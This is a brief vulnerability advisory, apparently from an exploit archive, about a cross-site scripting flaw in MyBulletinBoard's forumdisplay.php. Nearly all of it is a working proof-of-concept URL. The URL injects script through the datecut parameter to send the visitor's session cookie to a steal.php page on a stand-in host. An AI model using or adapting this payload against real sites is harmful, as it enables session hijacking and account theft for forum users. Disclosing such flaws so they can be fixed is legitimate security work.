MyBulletinBoard Forumdisplay.PHP Cross-Site Scripting Vulnerability

MyBulletinBoard Forumdisplay.PHP Cross-Site Scripting Vulnerability

No exploit is required.

An example has been provided:

http://www.example.com/forumdisplay.php?fid=2&datecut=<http://www.forum.com/forumdisplay.php?fid=2&datecut=>""><script>window.location="http://www.example.com/steal.php?cookie="+document.cookie</script>